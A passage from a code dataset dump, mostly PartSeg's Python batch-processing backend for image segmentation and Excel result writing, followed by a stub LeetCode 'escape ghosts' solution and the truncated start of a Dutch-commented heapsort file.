Any, Dict, List, NamedTuple, Optional, Tuple, Type, Union\n\nimport numpy as np\nimport pandas as pd\nimport SimpleITK\nimport tifffile\nimport xlsxwriter\n\nfrom PartSegCore.algorithm_describe_base import ROIExtractionProfile\nfrom PartSegCore.analysis.algorithm_description import AnalysisAlgorithmSelection\nfrom PartSegCore.analysis.batch_processing.parallel_backend import BatchManager, SubprocessOrder\nfrom PartSegCore.analysis.calculation_plan import (\n BaseCalculation,\n Calculation,\n CalculationPlan,\n CalculationTree,\n FileCalculation,\n MaskCreate,\n MaskIntersection,\n MaskMapper,\n MaskSum,\n MaskUse,\n MeasurementCalculate,\n Operations,\n RootType,\n Save,\n get_save_path,\n)\nfrom PartSegCore.analysis.io_utils import ProjectTuple\nfrom PartSegCore.analysis.load_functions import LoadMaskSegmentation, LoadProject, load_dict\nfrom PartSegCore.analysis.measurement_base import has_mask_components, has_roi_components\nfrom PartSegCore.analysis.measurement_calculation import MeasurementResult\nfrom PartSegCore.analysis.save_functions import save_dict\nfrom PartSegCore.io_utils import WrongFileTypeException\nfrom PartSegCore.json_hooks import PartSegEncoder\nfrom PartSegCore.mask_create import calculate_mask\nfrom PartSegCore.project_info import AdditionalLayerDescription, HistoryElement\nfrom PartSegCore.roi_info import ROIInfo\nfrom PartSegCore.segmentation import RestartableAlgorithm\nfrom PartSegCore.segmentation.algorithm_base import ROIExtractionAlgorithm, report_empty_fun\nfrom PartSegCore.utils import iterate_names\nfrom PartSegImage import Image, TiffImageReader\n\n# https://support.microsoft.com/en-us/office/excel-specifications-and-limits-1672b34d-7043-467e-8e27-269d656771c3#ID0EDBD=Newer_versions\n# page with excel limits\nMAX_CHAR_IN_EXCEL_CELL = 30_000 # real limit is 32_767 but it is better to have some margin\nMAX_ROWS_IN_EXCEL_CELL = 50 # real limit is 253 but 50 provides better readability\n\n\nclass ResponseData(NamedTuple):\n path_to_file: str\n values: List[MeasurementResult]\n\n\nCalculationResultList = List[ResponseData]\nErrorInfo = Tuple[Exception, Union[StackSummary, Tuple[Dict, StackSummary]]]\nWrappedResult = Tuple[int, List[Union[ErrorInfo, ResponseData]]]\n\n\ndef prepare_error_data(exception: Exception) -> ErrorInfo:\n try:\n from sentry_sdk.serializer import serialize\n from sentry_sdk.utils import event_from_exception\n\n event = event_from_exception(exception)[0]\n event = serialize(event)\n return exception, (event, traceback.extract_tb(exception.__traceback__))\n except ImportError: # pragma: no cover\n return exception, traceback.extract_tb(exception.__traceback__)\n\n\ndef do_calculation(file_info: Tuple[int, str], calculation: BaseCalculation) -> WrappedResult:\n \"\"\"\n Main function which will be used for run calculation.\n It create :py:class:`.CalculationProcess` and call it method\n :py:meth:`.CalculationProcess.do_calculation`\n\n :param file_info: index and path to file which should be processed\n :param calculation: calculation description\n \"\"\"\n with contextlib.suppress(AttributeError):\n SimpleITK.ProcessObject_SetGlobalDefaultNumberOfThreads(1)\n calc = CalculationProcess()\n index, file_path = file_info\n try:\n return index, calc.do_calculation(FileCalculation(file_path, calculation))\n except Exception as e: # pylint: disable=broad-except\n return index, [prepare_error_data(e)]\n\n\nclass CalculationProcess:\n \"\"\"\n Main class to calculate PartSeg calculation plan.\n To support other operations overwrite :py:meth:`recursive_calculation`\n call super function to support already defined operations.\n \"\"\"\n\n def __init__(self):\n self.reused_mask = set()\n self.mask_dict = {}\n self.calculation = None\n self.measurement: List[MeasurementResult] = []\n self.image: Optional[Image] = None\n self.roi_info: Optional[ROIInfo] = None\n self.additional_layers: Dict[str, AdditionalLayerDescription] = {}\n self.mask: Optional[np.ndarray] = None\n self.history: List[HistoryElement] = []\n self.algorithm_parameters: dict = {}\n self.results: CalculationResultList = []\n\n def _reset_image_cache(self):\n self.image = None\n self.roi_info = None\n self.additional_layers = {}\n self.mask = None\n self.history = []\n self.algorithm_parameters = {}\n self.measurement = []\n self.reused_mask = set()\n\n @staticmethod\n def load_data(operation, calculation: FileCalculation) -> Union[ProjectTuple, List[ProjectTuple]]:\n metadata = {\"default_spacing\": calculation.voxel_size}\n ext = path.splitext(calculation.file_path)[1]\n if operation == RootType.Image:\n for load_class in load_dict.values():\n if load_class.partial() or load_class.number_of_files() != 1:\n continue\n if ext in load_class.get_extensions():\n return load_class.load([calculation.file_path], metadata=metadata)\n raise ValueError(\"File type not supported\")\n if operation == RootType.Project:\n return LoadProject.load([calculation.file_path], metadata=metadata)\n try:\n return LoadProject.load([calculation.file_path], metadata=metadata)\n except (KeyError, WrongFileTypeException):\n # TODO identify exceptions\n return LoadMaskSegmentation.load([calculation.file_path], metadata=metadata)\n\n def do_calculation(self, calculation: FileCalculation) -> CalculationResultList:\n \"\"\"\n Main function for calculation process\n\n :param calculation: calculation to do.\n :return:\n \"\"\"\n self.calculation = calculation\n self.reused_mask = calculation.calculation_plan.get_reused_mask()\n self.mask_dict = {}\n self.measurement = []\n self.results = []\n operation = calculation.calculation_plan.execution_tree.operation\n projects = self.load_data(operation, calculation)\n\n if isinstance(projects, ProjectTuple):\n projects = [projects]\n for project in projects:\n try:\n self.image = project.image\n if calculation.overwrite_voxel_size:\n self.image.set_spacing(calculation.voxel_size)\n if operation == RootType.Mask_project:\n self.mask = project.mask\n if operation == RootType.Project:\n self.mask = project.mask\n # FIXME when load annotation from project is done\n self.roi_info = project.roi_info\n self.additional_layers = project.additional_layers\n self.history = project.history\n self.algorithm_parameters = project.algorithm_parameters\n\n self.iterate_over(calculation.calculation_plan.execution_tree)\n for el in self.measurement:\n el.set_filename(path.relpath(project.image.file_path, calculation.base_prefix))\n self.results.append(\n ResponseData(path.relpath(project.image.file_path, calculation.base_prefix), self.measurement)\n )\n except Exception as e: # pylint: disable=broad-except\n self.results.append(prepare_error_data(e))\n self._reset_image_cache()\n return self.results\n\n def iterate_over(self, node: Union[CalculationTree, List[CalculationTree]]):\n \"\"\"\n Execute calculation on node children or list oof nodes\n\n :type node: CalculationTree\n :param node:\n :return:\n \"\"\"\n if isinstance(node, CalculationTree):\n node = node.children\n for el in node:\n self.recursive_calculation(el)\n\n def step_load_mask(self, operation: MaskMapper, children: List[CalculationTree]):\n \"\"\"\n Load mask using mask mapper (mask can be defined with suffix, substitution, or file with mapping saved,\n then iterate over ``children`` nodes.\n\n :param MaskMapper operation: operation to perform\n :param List[CalculationTree] children: list of nodes to iterate over with applied mask\n \"\"\"\n mask_path = operation.get_mask_path(self.calculation.file_path)\n if not mask_path: # pragma: no cover\n raise ValueError(\"Empty path to mask.\")\n if not os.path.exists(mask_path):\n raise OSError(f\"Mask file {mask_path} does not exists\")\n with tifffile.TiffFile(mask_path) as mask_file:\n mask = mask_file.asarray()\n mask = TiffImageReader.update_array_shape(mask, mask_file.series[0].axes)\n if \"C\" in TiffImageReader.image_class.axis_order:\n pos: List[Union[slice, int]] = [slice(None) for _ in range(mask.ndim)]\n pos[TiffImageReader.image_class.axis_order.index(\"C\")] = 0\n mask = mask[tuple(pos)]\n\n mask = (mask > 0).astype(np.uint8)\n try:\n mask = self.image.fit_array_to_image(mask)[0]\n # TODO fix this time bug fix\n except ValueError as e: # pragma: no cover\n raise ValueError(\"Mask do not fit to given image\") from e\n old_mask = self.mask\n self.mask = mask\n self.iterate_over(children)\n self.mask = old_mask\n\n def step_segmentation(self, operation: ROIExtractionProfile, children: List[CalculationTree]):\n \"\"\"\n Perform segmentation and iterate over ``children`` nodes\n\n :param ROIExtractionProfile operation: Specification of segmentation operation\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n segmentation_class = AnalysisAlgorithmSelection.get(operation.algorithm)\n if segmentation_class is None: # pragma: no cover\n raise ValueError(f\"Segmentation class {operation.algorithm} do not found\")\n segmentation_algorithm: RestartableAlgorithm = segmentation_class()\n segmentation_algorithm.set_image(self.image)\n segmentation_algorithm.set_mask(self.mask)\n if segmentation_algorithm.__new_style__:\n segmentation_algorithm.set_parameters(operation.values)\n else:\n segmentation_algorithm.set_parameters(**operation.values)\n result = segmentation_algorithm.calculation_run(report_empty_fun)\n backup_data = self.roi_info, self.additional_layers, self.algorithm_parameters\n self.roi_info = ROIInfo(result.roi, result.roi_annotation, result.alternative_representation)\n self.additional_layers = result.additional_layers\n self.algorithm_parameters = {\"algorithm_name\": operation.algorithm, \"values\": operation.values}\n self.iterate_over(children)\n self.roi_info, self.additional_layers, self.algorithm_parameters = backup_data\n\n def step_mask_use(self, operation: MaskUse, children: List[CalculationTree]):\n \"\"\"\n use already defined mask and iterate over ``children`` nodes\n\n :param MaskUse operation:\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n old_mask = self.mask\n mask = self.mask_dict[operation.name]\n self.mask = mask\n self.iterate_over(children)\n self.mask = old_mask\n\n def step_mask_operation(self, operation: Union[MaskSum, MaskIntersection], children: List[CalculationTree]):\n \"\"\"\n Generate new mask by sum or intersection of existing and iterate over ``children`` nodes\n\n :param operation: mask operation to perform\n :type operation: Union[MaskSum, MaskIntersection]\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n old_mask = self.mask\n mask1 = self.mask_dict[operation.mask1]\n mask2 = self.mask_dict[operation.mask2]\n if isinstance(operation, MaskSum):\n mask = np.logical_or(mask1, mask2).astype(np.uint8)\n else:\n mask = np.logical_and(mask1, mask2).astype(np.uint8)\n self.mask = mask\n self.iterate_over(children)\n self.mask = old_mask\n\n def step_save(self, operation: Save):\n \"\"\"\n Perform save operation selected in plan.\n\n :param Save operation: save definition\n \"\"\"\n save_class = save_dict[operation.algorithm]\n project_tuple = ProjectTuple(\n file_path=\"\",\n image=self.image,\n roi_info=self.roi_info,\n additional_layers=self.additional_layers,\n mask=self.mask,\n history=self.history,\n algorithm_parameters=self.algorithm_parameters,\n )\n save_path = get_save_path(operation, self.calculation)\n save_dir = os.path.dirname(save_path)\n os.makedirs(save_dir, exist_ok=True)\n save_class.save(save_path, project_tuple, operation.values)\n\n def step_mask_create(self, operation: MaskCreate, children: List[CalculationTree]):\n \"\"\"\n Create mask from current segmentation state using definition\n\n :param MaskCreate operation: mask create description.\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n mask = calculate_mask(\n mask_description=operation.mask_property,\n roi=self.roi_info.roi,\n old_mask=self.mask,\n spacing=self.image.spacing,\n time_axis=self.image.time_pos,\n )\n if operation.name in self.reused_mask:\n self.mask_dict[operation.name] = mask\n history_element = HistoryElement.create(\n self.roi_info,\n self.mask,\n self.algorithm_parameters,\n operation.mask_property,\n )\n backup = self.mask, self.history\n self.mask = mask\n self.history.append(history_element)\n self.iterate_over(children)\n self.mask, self.history = backup\n\n def step_measurement(self, operation: MeasurementCalculate):\n \"\"\"\n Calculate measurement defined in current operation.\n\n :param MeasurementCalculate operation: definition of measurement to calculate\n \"\"\"\n channel = operation.channel\n if channel == -1:\n segmentation_class: Type[ROIExtractionAlgorithm] = AnalysisAlgorithmSelection.get(\n self.algorithm_parameters[\"algorithm_name\"]\n )\n if segmentation_class is None: # pragma: no cover\n raise ValueError(f\"Segmentation class {self.algorithm_parameters['algorithm_name']} do not found\")\n if segmentation_class.__new_style__:\n channel = getattr(self.algorithm_parameters[\"values\"], segmentation_class.get_channel_parameter_name())\n else:\n channel = self.algorithm_parameters[\"values\"][segmentation_class.get_channel_parameter_name()]\n\n # FIXME use additional information\n old_mask = self.image.mask\n self.image.set_mask(self.mask)\n measurement = operation.measurement_profile.calculate(\n self.image,\n channel,\n self.roi_info,\n operation.units,\n )\n self.measurement.append(measurement)\n self.image.set_mask(old_mask)\n\n def recursive_calculation(self, node: CalculationTree):\n \"\"\"\n Identify node type and then call proper ``step_*`` function\n\n :param CalculationTree node: Node to be proceed\n \"\"\"\n if isinstance(node.operation, MaskMapper):\n self.step_load_mask(node.operation, node.children)\n elif isinstance(node.operation, ROIExtractionProfile):\n self.step_segmentation(node.operation, node.children)\n elif isinstance(node.operation, MaskUse):\n self.step_mask_use(node.operation, node.children)\n elif isinstance(node.operation, (MaskSum, MaskIntersection)):\n self.step_mask_operation(node.operation, node.children)\n elif isinstance(node.operation, Save):\n self.step_save(node.operation)\n elif isinstance(node.operation, MaskCreate):\n self.step_mask_create(node.operation, node.children)\n elif isinstance(node.operation, Operations): # pragma: no cover\n # backward compatibility\n self.iterate_over(node)\n elif isinstance(node.operation, MeasurementCalculate):\n self.step_measurement(node.operation)\n else: # pragma: no cover\n raise ValueError(f\"Unknown operation {type(node.operation)} {node.operation}\")\n\n\nclass BatchResultDescription(NamedTuple):\n \"\"\"\n Tuple to handle information about part of calculation result.\n \"\"\"\n\n errors: List[Tuple[str, ErrorInfo]] #: list of errors occurred during calculation\n global_counter: int #: total number of calculated steps\n jobs_status: Dict[uuid.UUID, int] #: for each job information about progress\n\n\nclass CalculationManager:\n \"\"\"\n This class manage batch processing in PartSeg.\n\n \"\"\"\n\n def __init__(self):\n self.batch_manager = BatchManager()\n self.calculation_queue = Queue()\n self.calculation_dict: Dict[uuid.UUID, Calculation] = OrderedDict()\n self.calculation_sizes = []\n self.calculation_size = 0\n self.calculation_done = 0\n self.counter_dict = OrderedDict()\n self.errors_list = []\n self.writer = DataWriter()\n\n def is_valid_sheet_name(self, excel_path: str, sheet_name: str) -> bool:\n \"\"\"\n Check if sheet name can be used\n\n :param str excel_path: path which allow identify excel file\n :param str sheet_name: name of excel sheet\n :return:\n :rtype: bool\n \"\"\"\n return self.writer.is_empty_sheet(excel_path, sheet_name)\n\n def remove_calculation(self, calculation: Calculation):\n size = len(calculation.file_list)\n self.calculation_size -= size\n self.writer.remove_data_part(calculation)\n\n def cancel_calculation(self, calculation: Calculation):\n self.batch_manager.cancel_work(calculation)\n\n def add_calculation(self, calculation: Calculation):\n \"\"\"\n :param calculation: Calculation\n \"\"\"\n self.calculation_dict[calculation.uuid] = calculation\n self.counter_dict[calculation.uuid] = 0\n size = len(calculation.file_list)\n self.calculation_sizes.append(size)\n self.calculation_size += size\n self.batch_manager.add_work(\n list(enumerate(calculation.file_list)), calculation.get_base_calculation(), do_calculation\n )\n self.writer.add_data_part(calculation)\n\n @property\n def has_work(self) -> bool:\n \"\"\"\n Is still some calculation or data writing in progress\n \"\"\"\n return self.batch_manager.has_work or not self.writer.writing_finished()\n\n def kill_jobs(self):\n self.batch_manager.kill_jobs()\n\n def set_number_of_workers(self, val: int):\n \"\"\"\n Set number of workers to perform calculation.\n\n :param int val: number of workers.\n \"\"\"\n logging.debug(\"Number off process %s\", val)\n self.batch_manager.set_number_of_process(val)\n\n def get_results(self) -> BatchResultDescription:\n \"\"\"\n Consume results from :py:class:`BatchWorker` and transfer it to :py:class:`DataWriter`\n\n :return: information about calculation status\n :rtype: BatchResultDescription\n \"\"\"\n responses: List[Tuple[uuid.UUID, WrappedResult]] = self.batch_manager.get_result()\n new_errors: List[Tuple[str, ErrorInfo]] = []\n for uuid_id, (ind, result_list) in responses:\n self.calculation_done += 1\n self.counter_dict[uuid_id] += 1\n calculation = self.calculation_dict[uuid_id]\n for el in result_list:\n if isinstance(el, ResponseData):\n errors = self.writer.add_result(el, calculation, ind=ind)\n new_errors.extend((el.path_to_file, err) for err in errors)\n elif el != SubprocessOrder.cancel_job:\n file_info = calculation.file_list[ind] if ind != -1 else \"unknown file\"\n self.writer.add_calculation_error(calculation, file_info, el[0])\n self.errors_list.append((file_info, el))\n new_errors.append((file_info, el))\n\n if self.counter_dict[uuid_id] == len(calculation.file_list):\n errors = self.writer.calculation_finished(calculation)\n new_errors.extend((\"\", err) for err in errors)\n return BatchResultDescription(new_errors, self.calculation_done, self.counter_dict.copy())\n\n\nclass FileType(Enum):\n excel_xlsx_file = 1\n excel_xls_file = 2\n text_file = 3\n\n\nclass SheetData:\n \"\"\"\n Store single sheet information\n \"\"\"\n\n def __init__(self, name: str, columns: List[Tuple[str, str]], raw=False):\n if len(columns) != len(set(columns)):\n raise ValueError(f\"Columns should be unique: {columns}\")\n self.name = name\n if raw:\n self.columns = pd.MultiIndex.from_tuples(columns)\n else:\n self.columns = pd.MultiIndex.from_tuples([(\"name\", \"units\"), *columns])\n self.data_frame = pd.DataFrame([], columns=self.columns)\n self.row_list: List[Any] = []\n\n def add_data(self, data, ind):\n if len(data) != len(self.columns):\n raise ValueError(\n f\"Wrong number of columns in data ({len(data)} instead of \"\n f\"{len(self.columns)} {data} for columns {self.columns.values}\"\n )\n if ind is None:\n ind = len(self.row_list)\n self.row_list.append((ind, data))\n\n def add_data_list(self, data, ind):\n if ind is None:\n ind = len(self.row_list)\n for x in data:\n self.add_data(x, ind)\n\n def get_data_to_write(self) -> Tuple[str, pd.DataFrame]:\n \"\"\"\n Get data for write\n\n :return: sheet name and data to write\n :rtype: Tuple[str, pd.DataFrame]\n \"\"\"\n sorted_row = [x[1] for x in sorted(self.row_list)]\n df = pd.DataFrame(sorted_row, columns=self.columns)\n df2 = pd.concat((self.data_frame, df), axis=0)\n self.data_frame = df2.reset_index(drop=True)\n self.row_list = []\n return self.name, self.data_frame\n\n def __repr__(self):\n return f\"SheetData(name={self.name}, columns{list(self.columns)[1:]}, wait_rows={len(self.row_list)})\"\n\n\nclass FileData:\n \"\"\"\n Handle information about single file.\n\n This class run separate thread for writing purpose.\n This need additional synchronisation. but not freeze\n\n :param BaseCalculation calculation: calculation information\n :param int write_threshold: every how many lines of data are written to disk\n :cvar component_str: separator for per component sheet information\n \"\"\"\n\n component_str = \"_comp_\" #: separator for per component sheet information\n\n def __init__(self, calculation: BaseCalculation, write_threshold: int = 40):\n \"\"\"\n :param BaseCalculation calculation: calculation information\n :param int write_threshold: every how many lines of data are written to disk\n \"\"\"\n self.file_path = calculation.measurement_file_path\n ext = path.splitext(calculation.measurement_file_path)[1]\n if ext == \".xlsx\":\n self.file_type = FileType.excel_xlsx_file\n elif ext == \".xls\": # pragma: no cover\n self.file_type = FileType.excel_xls_file\n else: # pragma: no cover\n self.file_type = FileType.text_file\n self.writing = False\n data = SheetData(\"calculation_info\", [(\"Description\", \"str\"), (\"JSON\", \"str\")], raw=True)\n data.add_data(\n [str(calculation.calculation_plan), json.dumps(calculation.calculation_plan, cls=PartSegEncoder)], 0\n )\n self.sheet_dict = {}\n self.calculation_info = {}\n self.sheet_set = {\"Errors\"}\n self.new_count = 0\n self.write_threshold = write_threshold\n self.wrote_queue = Queue()\n self.error_queue = Queue()\n self.write_thread = threading.Thread(target=self.wrote_data_to_file)\n self.write_thread.daemon = True\n self.write_thread.start()\n self._error_info = []\n self.add_data_part(calculation)\n\n def finished(self):\n \"\"\"check if any data wait on write to disc\"\"\"\n return not self.writing and self.wrote_queue.empty()\n\n def good_sheet_name(self, name: str) -> Tuple[bool, str]:\n \"\"\"\n Check if sheet name can be used in current file.\n Return False if:\n\n * file is text file\n * contains :py:attr:`component_str` in name\n * name is already in use\n\n :param str name: sheet name\n :return: if can be used and error message\n \"\"\"\n if self.file_type == FileType.text_file:\n return False, \"Text file allow store only one sheet\"\n if self.component_str in name:\n return False, f\"Sequence '{FileData.component_str}' is reserved for auto generated sheets\"\n if name in self.sheet_set:\n return False, f\"Sheet name {name} already in use\"\n return True, \"\"\n\n def remove_data_part(self, calculation: BaseCalculation):\n if calculation.uuid in self.sheet_dict:\n sheet_list = self.sheet_dict[calculation.uuid][1]\n for sheet in sheet_list:\n if sheet is None:\n continue\n self.sheet_set.remove(sheet.name)\n self.sheet_set.remove(calculation.sheet_name)\n del self.sheet_dict[calculation.uuid]\n\n if calculation.uuid in self.calculation_info:\n del self.calculation_info[calculation.uuid]\n\n def add_data_part(self, calculation: BaseCalculation):\n \"\"\"\n Add new calculation which result will be stored in handled file.\n\n :param BaseCalculation calculation: information about calculation\n :raises ValueError: when :py:attr:`measurement_file_path` is different to handled file\n or :py:attr:`sheet_name` name already is in use.\n \"\"\"\n if calculation.measurement_file_path != self.file_path:\n raise ValueError(f\"[FileData] different file path {calculation.measurement_file_path} vs {self.file_path}\")\n if calculation.sheet_name in self.sheet_set: # pragma: no cover\n raise ValueError(f\"[FileData] sheet name {calculation.sheet_name} already in use\")\n measurement = calculation.calculation_plan.get_measurements()\n component_information = [x.measurement_profile.get_component_info(x.units) for x in measurement]\n num = 1\n sheet_list = []\n header_list = []\n main_header = []\n for i, el in enumerate(component_information):\n local_header = []\n component_seg = has_roi_components(measurement[i].measurement_profile.get_component_and_area_info())\n component_mask = has_mask_components(measurement[i].measurement_profile.get_component_and_area_info())\n if component_seg:\n local_header.append((\"Segmentation component\", \"num\"))\n if component_mask:\n local_header.append((\"Mask component\", \"num\"))\n if any(x[1] for x in el):\n sheet_list.append(\n f\"{calculation.sheet_name}{FileData.component_str}{num} - \"\n f\"{measurement[i].name_prefix + measurement[i].name}\"\n )\n\n num += 1\n else:\n sheet_list.append(None)\n for name, comp in el:\n local_header.append(name)\n if not comp:\n main_header.append(name)\n header_list.append(local_header)\n\n self.sheet_dict[calculation.uuid] = (\n SheetData(calculation.sheet_name, main_header),\n [SheetData(name, header_list[i]) if name is not None else None for i, name in enumerate(sheet_list)],\n component_information,\n )\n self.sheet_set.add(calculation.sheet_name)\n self.sheet_set.update(sheet_list)\n self.calculation_info[calculation.uuid] = calculation.calculation_plan\n\n def wrote_data(self, uuid_id: uuid.UUID, data: ResponseData, ind: Optional[int] = None):\n \"\"\"\n Add information to be stored in output file\n\n :param uuid.UUID uuid_id: calculation identifier\n :param ResponseData data: calculation result\n :param Optional[int] ind: element index\n \"\"\"\n self.new_count += 1\n main_sheet, component_sheets, _component_information = self.sheet_dict[uuid_id]\n name = data.path_to_file\n data_list = [name]\n for el, comp_sheet in zip(data.values, component_sheets):\n data_list.extend(el.get_global_parameters()[1:])\n comp_list = el.get_separated()\n if comp_sheet is not None:\n comp_sheet.add_data_list(comp_list, ind)\n main_sheet.add_data(data_list, ind)\n if self.new_count >= self.write_threshold:\n self.dump_data()\n self.new_count = 0\n\n def wrote_errors(self, file_path, error_description):\n self.new_count += 1\n self._error_info.append((file_path, str(error_description)))\n\n def dump_data(self):\n \"\"\"\n Fire writing data to disc\n \"\"\"\n data = []\n for main_sheet, component_sheets, _ in self.sheet_dict.values():\n data.append(main_sheet.get_data_to_write())\n data.extend(sheet.get_data_to_write() for sheet in component_sheets if sheet is not None)\n\n self.wrote_queue.put((data, list(self.calculation_info.values()), self._error_info[:]))\n\n def wrote_data_to_file(self):\n \"\"\"\n Main function to write data to hard drive.\n It is executed in separate thread.\n \"\"\"\n while True:\n data = self.wrote_queue.get()\n if data == \"finish\":\n break\n self.writing = True\n try:\n if self.file_type == FileType.text_file:\n base_path, ext = path.splitext(self.file_path)\n for sheet_name, data_frame in data[0]:\n data_frame.to_csv(f\"{base_path}_{sheet_name}{ext}\")\n continue\n file_path = self.file_path\n i = 0\n while i < 100:\n i += 1\n try:\n self.write_to_excel(file_path, data)\n break\n except OSError:\n base, ext = path.splitext(self.file_path)\n file_path = f\"{base}({i}){ext}\"\n if i == 100: # pragma: no cover\n raise PermissionError(f\"Fail to write result excel {self.file_path}\")\n except Exception as e: # pragma: no cover # pylint: disable=broad-except\n logging.error(\"[batch_backend] %s\", e)\n self.error_queue.put(prepare_error_data(e))\n finally:\n self.writing = False\n\n @classmethod\n def write_to_excel(\n cls, file_path: str, data: Tuple[List[Tuple[str, pd.DataFrame]], List[CalculationPlan], List[Tuple[str, str]]]\n ):\n with pd.ExcelWriter(file_path) as writer: # pylint: disable=abstract-class-instantiated\n new_sheet_names = []\n ind = 0\n sheets, plans, errors = data\n for sheet_name, _ in sheets:\n if len(sheet_name) < 32:\n new_sheet_names.append(sheet_name)\n else:\n new_sheet_names.append(f\"{sheet_name[:27]}_{ind}_\")\n ind += 1\n for sheet_name, (_, data_frame) in zip(new_sheet_names, sheets):\n data_frame.to_excel(writer, sheet_name=sheet_name)\n sheet = writer.book.sheetnames[sheet_name]\n sheet.set_column(1, 1, 10)\n for i, (text, _unit) in enumerate(data_frame.columns[1:], start=2):\n sheet.set_column(i, i, len(text) + 1)\n\n for calculation_plan in plans:\n cls.write_calculation_plan(writer, calculation_plan)\n\n if errors:\n errors_data = pd.DataFrame(errors, columns=[\"File path\", \"error description\"])\n errors_data.to_excel(writer, \"Errors\")\n\n @staticmethod\n def write_calculation_plan(writer: pd.ExcelWriter, calculation_plan: CalculationPlan):\n book: xlsxwriter.Workbook = writer.book\n sheet_name = iterate_names(f\"info {calculation_plan.name}\"[:30], book.sheetnames, 30)\n if sheet_name is None: # pragma: no cover\n raise ValueError(\n \"Name collision in sheets with information about calculation \"\n f\"plan: {f'info {calculation_plan.name}'[:30]}\"\n )\n\n sheet = book.add_worksheet(sheet_name)\n cell_format = book.add_format({\"bold\": True})\n sheet.write(\"A1\", \"Plan Description\", cell_format)\n sheet.write(\"B1\", \"Plan JSON\", cell_format)\n sheet.write(\"C1\", \"Plan JSON (readable)\", cell_format)\n description = calculation_plan.pretty_print().split(\"\\n\")\n for i in range(math.ceil(len(description) / MAX_ROWS_IN_EXCEL_CELL)):\n to_write = description[i * MAX_ROWS_IN_EXCEL_CELL : (i + 1) * MAX_ROWS_IN_EXCEL_CELL]\n sheet.write(f\"A{i+2}\", \"\\n\".join(to_write))\n sheet.set_row(i + 1, len(to_write) * 11 + 10)\n\n sheet.set_column(0, 0, max(map(len, description)))\n sheet.set_column(1, 1, 15)\n calculation_plan_str = json.dumps(calculation_plan, cls=PartSegEncoder)\n for i in range(math.ceil(len(calculation_plan_str) / MAX_CHAR_IN_EXCEL_CELL)):\n sheet.write(f\"B{i+2}\", calculation_plan_str[i * MAX_CHAR_IN_EXCEL_CELL : (i + 1) * MAX_CHAR_IN_EXCEL_CELL])\n\n calculation_plan_pretty = json.dumps(calculation_plan, cls=PartSegEncoder, indent=2).split(\"\\n\")\n for i in range(math.ceil(len(calculation_plan_pretty) / MAX_ROWS_IN_EXCEL_CELL)):\n to_write = calculation_plan_pretty[i * MAX_ROWS_IN_EXCEL_CELL : (i + 1) * MAX_ROWS_IN_EXCEL_CELL]\n sheet.write(f\"C{i+2}\", \"\\n\".join(to_write))\n sheet.set_row(i + 1, len(to_write) * 11 + 10)\n\n sheet.set_column(2, 2, max(map(len, calculation_plan_pretty)))\n\n def get_errors(self) -> List[ErrorInfo]:\n \"\"\"\n Get list of errors occurred in last write\n \"\"\"\n res = []\n while not self.error_queue.empty():\n res.append(self.error_queue.get())\n return res\n\n def finish(self):\n self.wrote_queue.put(\"finish\")\n\n def is_empty_sheet(self, sheet_name) -> bool:\n return self.good_sheet_name(sheet_name)[0]\n\n\nclass DataWriter:\n \"\"\"\n Handle information\n \"\"\"\n\n def __init__(self):\n self.file_dict: Dict[str, FileData] = {}\n\n def is_empty_sheet(self, file_path: str, sheet_name: str) -> bool:\n \"\"\"\n Check if given pair of `file_path` and `sheet_name` can be used.\n\n :param str file_path: path to file to store measurement result\n :param str sheet_name: Name of excel sheet in which data will be stored\n :return: If calling :py:meth:`FileData.add_data_part` finish without error.\n :rtype: bool\n \"\"\"\n if FileData.component_str in sheet_name:\n return False\n if file_path not in self.file_dict:\n return True\n return self.file_dict[file_path].is_empty_sheet(sheet_name)\n\n def add_data_part(self, calculation: BaseCalculation):\n \"\"\"\n Add information about calculation\n \"\"\"\n if calculation.measurement_file_path in self.file_dict:\n self.file_dict[calculation.measurement_file_path].add_data_part(calculation)\n else:\n self.file_dict[calculation.measurement_file_path] = FileData(calculation)\n\n def remove_data_part(self, calculation: BaseCalculation):\n if calculation.measurement_file_path in self.file_dict:\n self.file_dict[calculation.measurement_file_path].remove_data_part(calculation)\n\n def add_result(\n self, data: ResponseData, calculation: BaseCalculation, ind: Optional[int] = None\n ) -> List[ErrorInfo]:\n \"\"\"\n Add calculation result to file writer\n\n :raises ValueError: when calculation.measurement_file_path is not added with :py:meth:`.add_data_part`\n \"\"\"\n if calculation.measurement_file_path not in self.file_dict:\n raise ValueError(\"Unknown measurement file\")\n file_writer = self.file_dict[calculation.measurement_file_path]\n file_writer.wrote_data(calculation.uuid, data, ind)\n return file_writer.get_errors()\n\n def add_calculation_error(self, calculation: BaseCalculation, file_path: str, error):\n file_writer = self.file_dict[calculation.measurement_file_path]\n file_writer.wrote_errors(file_path, error)\n\n def writing_finished(self) -> bool:\n \"\"\"check if all data are written to disc\"\"\"\n return all(x.finished() for x in self.file_dict.values())\n\n def finish(self):\n \"\"\"close all files\"\"\"\n for file_data in self.file_dict.values():\n file_data.finish()\n\n def calculation_finished(self, calculation) -> List[ErrorInfo]:\n \"\"\"\n Force write data for given calculation.\n\n :raises ValueError: when measurement is not added with :py:meth:`.add_data_part`\n :return: list of errors during write.\n \"\"\"\n if calculation.measurement_file_path not in self.file_dict:\n raise ValueError(\"Unknown measurement file\")\n self.file_dict[calculation.measurement_file_path].dump_data()\n return self.file_dict[calculation.measurement_file_path].get_errors()\n","sub_path":"package/PartSegCore/analysis/batch_processing/batch_backend.py","file_name":"batch_backend.py","file_ext":"py","file_size_in_byte":39024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650749360","text":"class Solution:\n def escapeGhosts(self, ghosts, target):\n \"\"\"\n :type ghosts: List[List[int]]\n :type target: List[int]\n :rtype: bool\n \"\"\"\n\n\nif __name__ == '__main__':\n s = Solution()\n ghosts = [[2, 0]]\n target = [1, 0]\n print(s.escapeGhosts(ghosts, target))\n","sub_path":"0789-Escape The Ghosts.py","file_name":"0789-Escape The Ghosts.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366312262","text":"#Heapsort\n# Een moeilijk sorting algoritme\n# Je moet alle verschillende dingen in een heap steken, een soortement van\n# binaire boom, met de parent van een ding altijd groter dan de kindjes\n# de kindjes steek je op positie 2k en 2k+1, terwijl je de grotere op 